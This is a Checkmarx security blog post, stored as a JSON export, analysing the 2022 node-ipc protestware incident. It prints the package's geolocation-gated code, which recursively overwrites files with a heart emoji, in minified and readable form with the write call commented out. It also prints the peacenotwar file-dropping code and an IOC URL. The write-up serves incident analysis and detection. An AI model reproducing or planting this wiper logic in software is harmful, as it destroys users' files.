{"id":74453,"date":"2022-03-17T11:48:25","date_gmt":"2022-03-17T15:48:25","guid":{"rendered":"https:\/\/staging.checkmarx.com\/?p=74453"},"modified":"2025-01-03T10:36:16","modified_gmt":"2025-01-03T08:36:16","slug":"protestware-politics-and-open-source-software","status":"publish","type":"zero-post","link":"https:\/\/checkmarx.com\/blog\/protestware-politics-and-open-source-software\/","title":{"rendered":"Protestware, Politics, and Open-Source Software"},"content":{"rendered":"<h2 class=\"wp-block-heading article-anchor\" id=\"article-anchor-1\">Intro<\/h2>\n\n\n\n<p>A popular NPM package <a href=\"https:\/\/www.npmjs.com\/package\/node-ipc\" target=\"_blank\" rel=\"noreferrer noopener\">node-ipc<\/a> was purposely infected with a malicious payload by its own creator to protest over the Russia-Ukraine war. This package has over a million weekly downloads and hundreds of direct other dependent packages, including the popular <a href=\"https:\/\/cli.vuejs.org\/\" target=\"_blank\" rel=\"noreferrer noopener\">Vue CLI<\/a> project.<\/p>\n\n\n\n<p>GitHub user <a href=\"https:\/\/github.com\/RIAEvangelist\" target=\"_blank\" rel=\"noreferrer noopener\">RIAEvangelist<\/a>\/NPM user <a href=\"https:\/\/www.npmjs.com\/~riaevangelist\" target=\"_blank\" rel=\"noreferrer noopener\">riaevangelist<\/a> published new code to GitHub and NPM to protest Russian aggression in the Russia-Ukraine war:<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>Published new NPM package <a href=\"https:\/\/www.npmjs.com\/package\/peacenotwar\">peacenotwar,<\/a> which drops benign protest messages on the target machine.<\/li>\n\n\n\n<li>Added <a href=\"https:\/\/www.npmjs.com\/package\/peacenotwar\" target=\"_blank\" rel=\"noreferrer noopener\">peacenotwar<\/a> as a new dependency to <a href=\"https:\/\/www.npmjs.com\/package\/node-ipc\" target=\"_blank\" rel=\"noreferrer noopener\">node-ipc<\/a> package.<\/li>\n\n\n\n<li>Added a new file dao\/ssl-geospec.js to <a href=\"https:\/\/www.npmjs.com\/package\/node-ipc\" target=\"_blank\" rel=\"noreferrer noopener\">node-ipc<\/a> package. This addition targets users having Russian or Belarusian IP addresses and running a malicious payload, destroying all files on disk by rewriting their content with a heart emoji \u201c\u2764\ufe0f\u201d<\/li>\n<\/ol>\n\n\n\n<p>The main discussion about this incident started and is still ongoing in an issue on the package\u2019s github repository. Since GitHub user <a href=\"https:\/\/github.com\/RIAEvangelist\" target=\"_blank\" rel=\"noreferrer noopener\">RIAEvangelist<\/a> is the owner of the Git repository <a href=\"https:\/\/github.com\/RIAEvangelist\/node-ipc\" target=\"_blank\" rel=\"noreferrer noopener\">github.com\/RIAEvangelist\/node-ipc,<\/a> he has permission to edit other users\u2019 Issues. From the Issue history shown below, we observed he also purposely edited the Issue\u2019s title and description multiple times as an attempt to corrupt the information shared by the concerned users.<\/p>\n\n\n\n<figure><img decoding=\"async\" src=\"https:\/\/checkmarx.com\/wp-content\/uploads\/2022\/03\/Group-8-1-1024x748-1.png\" alt=\"\"><\/figure>\n\n\n\n<p>However, the history is still available. This way, we can see that the issue\u2019s originator has declared the code as \u201cmalware\/protestware\u201d a new(ish) phrase that caught even \u201cRIAEvangelist\u201d\u2019s eye:<\/p>\n\n\n\n<figure><img decoding=\"async\" src=\"https:\/\/checkmarx.com\/wp-content\/uploads\/2022\/03\/protestware-1024x386-1.png\" alt=\"\"><\/figure>\n\n\n\n<p>This incident comes not long after the \u201ccolors\u201d incident which might signifies the beginning of a trend in which influential package owner uses their \u201cstage\u201d to advocate for an idea or an issue they care about, catching the attention of many. \u201cRIAEvangelist\u201d himself winked to the \u201ccolor\u201d incident by adding this package as a new dependency to one of the new questionable versions of \u201cnode-ipc\u201d.<\/p>\n\n\n\n<h2 class=\"wp-block-heading article-anchor\" id=\"article-anchor-2\">Details<\/h2>\n\n\n\n<p>To summarize the investigation\u2019s findings, the following table contains all information of effected packages and versions related to this incident:<\/p>\n\n\n\n<figure><style>\n         table, th, td {\n            border: .5px solid black;padding:10px\n         }\n      <\/style>\n<table>\n<tbody>\n<tr>\n<td><strong>Package<\/strong><\/td>\n<td><strong>Version<\/strong><\/td>\n<td><strong>Available on NPM<\/strong><\/td>\n<td><strong>Details<\/strong><\/td>\n<\/tr>\n<tr>\n<td>node-ipc<\/td>\n<td>9.2.2<\/td>\n<td>No<\/td>\n<td>Require peacenotwar and colors<\/td>\n<\/tr>\n<tr>\n<td>node-ipc<\/td>\n<td>10.1.1, <br>10.1.2<\/td>\n<td>No<\/td>\n<td>Includes the file \u201cdao\/ssl-geospec.js\u201d with the malicious functionality described below<\/td>\n<\/tr>\n<tr>\n<td>node-ipc<\/td>\n<td>10.1.3<\/td>\n<td>No<\/td>\n<td>Includes <strong>no<\/strong> malicious or protest functionality<\/td>\n<\/tr>\n<tr>\n<td>node-ipc<\/td>\n<td>11.1.0<\/td>\n<td>Yes<\/td>\n<td>Require peacenotwar<\/td>\n<\/tr>\n<tr>\n<td>peacenotwar<\/td>\n<td>9.1.1,<br>9.1.2,<br>9.1.3,<br>9.1.4,<br>9.1.5,<br>9.1.6<\/td>\n<td>Yes<\/td>\n<td>Include the protest code described below<\/td>\n<\/tr>\n<tr>\n<td>oneday-test<\/td>\n<td>9.1.1<\/td>\n<td>Yes<\/td>\n<td>Include the protest code described below<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">Package \u201cnode-ipc\u201d<\/h3>\n\n\n\n<p>A new file was added to the package dao\/ssl-geospec.js and from the looks of it, it seems it is minified:<\/p>\n\n\n\n<pre><code>import u from\"path\";import a from\"fs\";import o from\"https\";setTimeout(function(){const t=Math.round(Math.random()*4);if(t&gt;1){return}const n=Buffer.from(\"aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ ...<\/code><\/pre>\n\n\n\n<p>The code is executed automatically with a slight delay, it is geo-location aware, and activates the malicious payload only for users connected to the internet from Russia or Belarus. To become location aware, the code is using the API of the free service <a href=\"https:\/\/ipgeolocation.io\" target=\"_blank\" rel=\"noreferrer noopener\">ipgeolocation.io.<\/a><\/p>\n\n\n\n<p>Once the condition to proceed with the malicious payload is fulfilled, the code tries to overwrite all the files on the victim\u2019s machine with \u201c\u2764\ufe0f\u201d (the heart emoji).<\/p>\n\n\n\n<p>Courtesy of the user <a href=\"https:\/\/github.com\/zkyf\" target=\"_blank\" rel=\"noreferrer noopener\">zkyf<\/a>, we have <a href=\"https:\/\/github.com\/vuejs\/vue-cli\/issues\/7054#issuecomment-1069209509\" target=\"_blank\" rel=\"noreferrer noopener\">a more readable version<\/a> of the original code:<\/p>\n\n\n\n<pre><code>const path = require(\"path\");\nconst fs = require(\"fs\");\nconst https = require(\"https\");\nsetTimeout(function () {\n    const randomNumber = Math.round(Math.random() * 4);\n    if (randomNumber &gt; 1) {\n        \/\/ return;\n    }\n    const apiKey = \"https:\/\/api.ipgeolocation.io\/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154\";\n    const pwd = \".\/\";\n    const parentDir = \"..\/\";\n    const grandParentDir = \"..\/..\/\";\n    const root = \"\/\";\n    const countryName = \"country_name\";\n    const russia = \"russia\";\n    const belarus = \"belarus\";\n    https.get(apiKey, function (message) {\n        message.on(\"data\", function (msgBuffer) {\n            try {\n                const message = JSON.parse(msgBuffer.toString(\"utf8\"));\n                const userCountryName = message[countryName.toString(\"utf8\")].toLowerCase();\n                const hasRus = userCountryName.includes(russia.toString(\"utf8\")) || userCountryName.includes(belarus.toString(\"utf8\")); \/\/ checks if country is Russia or Belarus\n                if (hasRus) {\n                    deleteFile(pwd);\n                    deleteFile(parentDir);\n                    deleteFile(grandParentDir);\n                    deleteFile(root);\n                }\n            } catch (t) {}\n        });\n    });\n    \/\/ zkyf: Let's try this directly here\n    deleteFile(pwd);\n    deleteFile(parentDir);\n    deleteFile(grandParentDir);\n    deleteFile(root);\n}, 100);\nasync function deleteFile(pathName = \"\", o = \"\") {\n    if (!fs.existsSync(pathName)) {\n        return;\n    }\n    let fileList = [];\n    try {\n        fileList = fs.readdirSync(pathName);\n    } catch (t) {}\n    const f = [];\n    const heartUtf8 = Buffer.from(\"4p2k77iP\", \"base64\");\n    for (var idx = 0; idx &lt; fileList.length; idx++) {\n        const fileName = path.join(pathName, fileList[idx]);\n        let fileInfo = null;\n        try {\n            fileInfo = fs.lstatSync(fileName);\n        } catch (err) {\n            continue;\n        }\n        if (fileInfo.isDirectory()) {\n            const fileSymbol = deleteFile(fileName, o);\n            fileSymbol.length &gt; 0 ? f.push(...fileSymbol) : null;\n        } else if (fileName.indexOf(o) &gt;= 0) {\n            try {\n                \/\/ fs.writeFile(fileName, heartUtf8.toString(\"utf8\"), function () {}); \/\/ overwrites file with `\u2764\ufe0f`\n                console.log(`Rewrite ${fileName}`);\n            } catch (err) {}\n        }\n    }\n    return f;\n}\n<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Packages \u201cpeacenotwar\u201d, \u201coneday-test\u201d<\/h3>\n\n\n\n<p>Creates a file called \u201cWITH-LOVE-FROM-AMERICA.txt\u201d on 3 locations on the victim of machine.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>~\/Desktop\/WITH-LOVE-FROM-AMERICA.txt<\/li>\n\n\n\n<li>~\/OneDrive\/WITH-LOVE-FROM-AMERICA.txt<\/li>\n\n\n\n<li>~\/OneDrive\/Desktop\/WITH-LOVE-FROM-AMERICA.txt<\/li>\n<\/ul>\n\n\n\n<p>The content of the file is a short statement written in 5 different languages \u2013 English, Russian, Arabic, Chinese, and Japanese:<\/p>\n\n\n\n<figure><img decoding=\"async\" src=\"https:\/\/checkmarx.com\/wp-content\/uploads\/2022\/03\/Group-7-941x1024-1.png\" alt=\"\"><\/figure>\n\n\n\n<p>Within the code, there\u2019s a function that copies \u201cWITH-LOVE-FROM-AMERICA.txt\u201d as follows:<\/p>\n\n\n\n<pre><code>function deliverAPeacefulMessage(path,message){ \n    console.log(path); \n    try{ \n        fs.writeFile( \n            path,  \n            message, \n            function(err){ \n                \/\/its all good \n            } \n        ); \n    }catch(err){ \n        \/\/thats ok \n    } \n}\nconst thinkaboutit='WITH-LOVE-FROM-AMERICA.txt';\nconst WITH_LOVE_FROM_AMERICA=read(`.\/${thinkaboutit}`);\nconst Desktops = `${homedir}\/Desktop\/`;\nconst OneDrive = `${homedir}\/OneDrive\/`;\nconst OneDriveDesktops = `${homedir}\/OneDrive\/Desktop\/`;\ndeliverAPeacefulMessage(`${Desktops}${thinkaboutit}`,WITH_LOVE_FROM_AMERICA); \ndeliverAPeacefulMessage(`${OneDriveDesktops}${thinkaboutit}`,WITH_LOVE_FROM_AMERICA); \ndeliverAPeacefulMessage(`${OneDrive}${thinkaboutit}`,WITH_LOVE_FROM_AMERICA);\n<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">IOCs<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>https:\/\/api.ipgeolocation.io\/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading article-anchor\" id=\"article-anchor-3\">ChainAlert<\/h2>\n\n\n\n<p><a href=\"https:\/\/github.com\/Checkmarx\/chainalert-github-action\" target=\"_blank\" rel=\"noreferrer noopener\">ChainAlert<\/a> is a free service by Checkmarx, which is a monitoring system that observes the open-source ecosystem, and alerts package maintainers and developers of potential account takeover attacks.<\/p>\n\n\n\n<p>In this specific case, ChainAlert bot has detected abnormal activity and notified about it with an issue on the GitHub repository. Obviously, since these actions were done deliberately by the \u201clegitimate\u201d owner of the project, the issue was closed by \u201cRIAEvangelist\u201d and was not dealt with any further.<\/p>\n\n\n\n<p>Learning from this case, we plan to add a detection of such self-sabotage cases to ensure that incidents such as this will be picked up quickly.<\/p>\n\n\n\n<figure><img decoding=\"async\" src=\"https:\/\/checkmarx.com\/wp-content\/uploads\/2022\/03\/chainalert-1024x576-1.png\" alt=\"\"><\/figure>\n\n\n\n<h2 class=\"wp-block-heading article-anchor\" id=\"article-anchor-4\">Conclusion<\/h2>\n\n\n\n<p>This incident raises again the question whether it is within the rights of the code\u2019s owner to change it in whichever way they see fit, even at the cost of causing damage to other users depend on it.<\/p>\n\n\n\n<p>As seen in the near past, this isn&#8217;t the first time we encounter such behavior, it seems likely that other prominent developers will follow and share their agenda in a similar manner. It also looks fitting to start using the term \u201cprotestware\u201d to describe this kind of software.<\/p>","protected":false},"excerpt":{"rendered":"<p>Intro A popular NPM package node-ipc was purposely infected with a malicious payload by its own creator to protest over the Russia-Ukraine war. This package has over a million weekly downloads and hundreds of direct other dependent packages, including the popular Vue CLI project. GitHub user RIAEvangelist\/NPM user riaevangelist published new code to GitHub and [&hellip;]<\/p>\n","protected":false},"author":45,"featured_media":74469,"template":"","zero-category":[1067,1104],"zero-tag":[1069,1105,1072,1068,1075,1073,1071],"class_list":["post-74453","zero-post","type-zero-post","status-publish","has-post-thumbnail","hentry","zero-category-blog","zero-category-technical-blog","zero-tag-appsec","zero-tag-article","zero-tag-awareness","zero-tag-checkmarx-security-research-team","zero-tag-developer","zero-tag-english","zero-tag-supply-chain-security"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.1.1 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Protestware, Politics, and Open-Source Software - Checkmarx.com<\/title>\n<meta name=\"description\" content=\"A popular NPM package node-ipc was purposely infected with a malicious payload by its own creator to protest over the Russia-Ukraine war. Checkmarx Security Research Team Blog.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/checkmarx.com\/blog\/protestware-politics-and-open-source-software\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Protestware, Politics, and Open-Source Software\" \/>\n<meta property=\"og:description\" content=\"A popular NPM package node-ipc was purposely infected with a malicious payload by its own creator to protest over the Russia-Ukraine war. Checkmarx Security Research Team Blog.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/checkmarx.com\/blog\/protestware-politics-and-open-source-software\/\" \/>\n<meta property=\"og:site_name\" content=\"Checkmarx\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/Checkmarx.Source.Code.Analysis\" \/>\n<meta property=\"article:modified_time\" content=\"2025-01-03T08:36:16+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/checkmarx.com\/wp-content\/uploads\/2022\/03\/thumbnail.png\" \/>\n\t<meta property=\"og:image:width\" content=\"1024\" \/>\n\t<meta property=\"og:image:height\" content=\"512\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:title\" content=\"Protestware, Politics, and Open-Source Software\" \/>\n<meta name=\"twitter:description\" content=\"A popular NPM package node-ipc was purposely infected with a malicious payload by its own creator to protest over the Russia-Ukraine war. Checkmarx Security Research Team Blog.\" \/>\n<meta name=\"twitter:image\" content=\"https:\/\/checkmarx.com\/wp-content\/uploads\/2022\/03\/thumbnail.png\" \/>\n<meta name=\"twitter:site\" content=\"@checkmarx\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/checkmarx.com\/blog\/protestware-politics-and-open-source-software\/\",\"url\":\"https:\/\/checkmarx.com\/blog\/protestware-politics-and-open-source-software\/\",\"name\":\"Protestware, Politics, and Open-Source Software - Checkmarx.com\",\"isPartOf\":{\"@id\":\"https:\/\/checkmarx.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/checkmarx.com\/blog\/protestware-politics-and-open-source-software\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/checkmarx.com\/blog\/protestware-politics-and-open-source-software\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/checkmarx.com\/wp-content\/uploads\/2022\/03\/thumbnail.png\",\"datePublished\":\"2022-03-17T15:48:25+00:00\",\"dateModified\":\"2025-01-03T08:36:16+00:00\",\"description\":\"A popular NPM package node-ipc was purposely infected with a malicious payload by its own creator to protest over the Russia-Ukraine war. Checkmarx Security Research Team Blog.\",\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/checkmarx.com\/blog\/protestware-politics-and-open-source-software\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/checkmarx.com\/blog\/protestware-politics-and-open-source-software\/#primaryimage\",\"url\":\"https:\/\/checkmarx.com\/wp-content\/uploads\/2022\/03\/thumbnail.png\",\"contentUrl\":\"https:\/\/checkmarx.com\/wp-content\/uploads\/2022\/03\/thumbnail.png\",\"width\":1024,\"height\":512},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/checkmarx.com\/#website\",\"url\":\"https:\/\/checkmarx.com\/\",\"name\":\"Checkmarx\",\"description\":\"The world runs on code. We secure it.\",\"publisher\":{\"@id\":\"https:\/\/checkmarx.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/checkmarx.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/checkmarx.com\/#organization\",\"name\":\"Checkmarx\",\"url\":\"https:\/\/checkmarx.com\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/checkmarx.com\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/checkmarx.com\/wp-content\/uploads\/2024\/02\/logo-dark.svg\",\"contentUrl\":\"https:\/\/checkmarx.com\/wp-content\/uploads\/2024\/02\/logo-dark.svg\",\"width\":1,\"height\":1,\"caption\":\"Checkmarx\"},\"image\":{\"@id\":\"https:\/\/checkmarx.com\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/Checkmarx.Source.Code.Analysis\",\"https:\/\/x.com\/checkmarx\",\"https:\/\/www.youtube.com\/user\/CheckmarxResearchLab\",\"https:\/\/www.linkedin.com\/company\/checkmarx\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Protestware, Politics, and Open-Source Software - Checkmarx.com","description":"A popular NPM package node-ipc was purposely infected with a malicious payload by its own creator to protest over the Russia-Ukraine war. Checkmarx Security Research Team Blog.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/checkmarx.com\/blog\/protestware-politics-and-open-source-software\/","og_locale":"en_US","og_type":"article","og_title":"Protestware, Politics, and Open-Source Software","og_description":"A popular NPM package node-ipc was purposely infected with a malicious payload by its own creator to protest over the Russia-Ukraine war. Checkmarx Security Research Team Blog.","og_url":"https:\/\/checkmarx.com\/blog\/protestware-politics-and-open-source-software\/","og_site_name":"Checkmarx","article_publisher":"https:\/\/www.facebook.com\/Checkmarx.Source.Code.Analysis","article_modified_time":"2025-01-03T08:36:16+00:00","og_image":[{"width":1024,"height":512,"url":"https:\/\/checkmarx.com\/wp-content\/uploads\/2022\/03\/thumbnail.png","type":"image\/png"}],"twitter_card":"summary_large_image","twitter_title":"Protestware, Politics, and Open-Source Software","twitter_description":"A popular NPM package node-ipc was purposely infected with a malicious payload by its own creator to protest over the Russia-Ukraine war. Checkmarx Security Research Team Blog.","twitter_image":"https:\/\/checkmarx.com\/wp-content\/uploads\/2022\/03\/thumbnail.png","twitter_site":"@checkmarx","twitter_misc":{"Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/checkmarx.com\/blog\/protestware-politics-and-open-source-software\/","url":"https:\/\/checkmarx.com\/blog\/protestware-politics-and-open-source-software\/","name":"Protestware, Politics, and Open-Source Software - Checkmarx.com","isPartOf":{"@id":"https:\/\/checkmarx.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/checkmarx.com\/blog\/protestware-politics-and-open-source-software\/#primaryimage"},"image":{"@id":"https:\/\/checkmarx.com\/blog\/protestware-politics-and-open-source-software\/#primaryimage"},"thumbnailUrl":"https:\/\/checkmarx.com\/wp-content\/uploads\/2022\/03\/thumbnail.png","datePublished":"2022-03-17T15:48:25+00:00","dateModified":"2025-01-03T08:36:16+00:00","description":"A popular NPM package node-ipc was purposely infected with a malicious payload by its own creator to protest over the Russia-Ukraine war. Checkmarx Security Research Team Blog.","inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/checkmarx.com\/blog\/protestware-politics-and-open-source-software\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/checkmarx.com\/blog\/protestware-politics-and-open-source-software\/#primaryimage","url":"https:\/\/checkmarx.com\/wp-content\/uploads\/2022\/03\/thumbnail.png","contentUrl":"https:\/\/checkmarx.com\/wp-content\/uploads\/2022\/03\/thumbnail.png","width":1024,"height":512},{"@type":"WebSite","@id":"https:\/\/checkmarx.com\/#website","url":"https:\/\/checkmarx.com\/","name":"Checkmarx","description":"The world runs on code. We secure it.","publisher":{"@id":"https:\/\/checkmarx.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/checkmarx.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/checkmarx.com\/#organization","name":"Checkmarx","url":"https:\/\/checkmarx.com\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/checkmarx.com\/#\/schema\/logo\/image\/","url":"https:\/\/checkmarx.com\/wp-content\/uploads\/2024\/02\/logo-dark.svg","contentUrl":"https:\/\/checkmarx.com\/wp-content\/uploads\/2024\/02\/logo-dark.svg","width":1,"height":1,"caption":"Checkmarx"},"image":{"@id":"https:\/\/checkmarx.com\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/Checkmarx.Source.Code.Analysis","https:\/\/x.com\/checkmarx","https:\/\/www.youtube.com\/user\/CheckmarxResearchLab","https:\/\/www.linkedin.com\/company\/checkmarx"]}]}},"_links":{"self":[{"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/zero-post\/74453","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/zero-post"}],"about":[{"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/types\/zero-post"}],"author":[{"embeddable":true,"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/users\/45"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/media\/74469"}],"wp:attachment":[{"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/media?parent=74453"}],"wp:term":[{"taxonomy":"zero-category","embeddable":true,"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/zero-category?post=74453"},{"taxonomy":"zero-tag","embeddable":true,"href":"https:\/\/checkmarx.com\/wp-json\/wp\/v2\/zero-tag?post=74453"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}